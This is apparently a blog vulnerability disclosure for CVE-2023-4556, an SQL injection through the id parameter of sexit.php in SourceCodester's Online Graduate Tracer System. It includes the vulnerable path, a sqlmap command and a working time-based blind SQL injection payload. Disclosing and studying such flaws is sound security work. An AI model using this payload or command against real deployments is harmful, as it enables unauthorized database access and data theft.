Headline
CVE-2023-4556: Online Graduate Tracer System sexit.php sql injection_@sec的博客-CSDN博客
A vulnerability was found in SourceCodester Online Graduate Tracer System 1.0 and classified as critical. Affected by this issue is the function mysqli_query of the file sexit.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-238154 is the identifier assigned to this vulnerability.
@sec 于 2023-08-26 09:39:36 发布 18 收藏
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
Online Graduate Tracer System sexit.php sql injection
url:tracking/admin/sexit.php
Abstract:
Line 142 of sexit.php invokes a SQL query built using unvalidated input. This call could allow an attacker to modify the statement’s meaning or to execute arbitrary SQL commands.
Explanation:
SQL injection errors occur when:
Data enters a program from an untrusted source.
The data is used to dynamically construct a SQL query.
In this case the data is passed to mysqli_query() in sexit.php at line 142.
sqlmap.py -u "http://127.0.0.1/shenji/tracking/admin/sexit.php?id=1"
---
Parameter: id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 1550 FROM (SELECT(SLEEP(5)))fOxo) AND 'GLQe'='GLQe
---
Download Code:
https://www.sourcecodester.com/php/15904/online-graduate-tracer-system-college-ict-alumni.html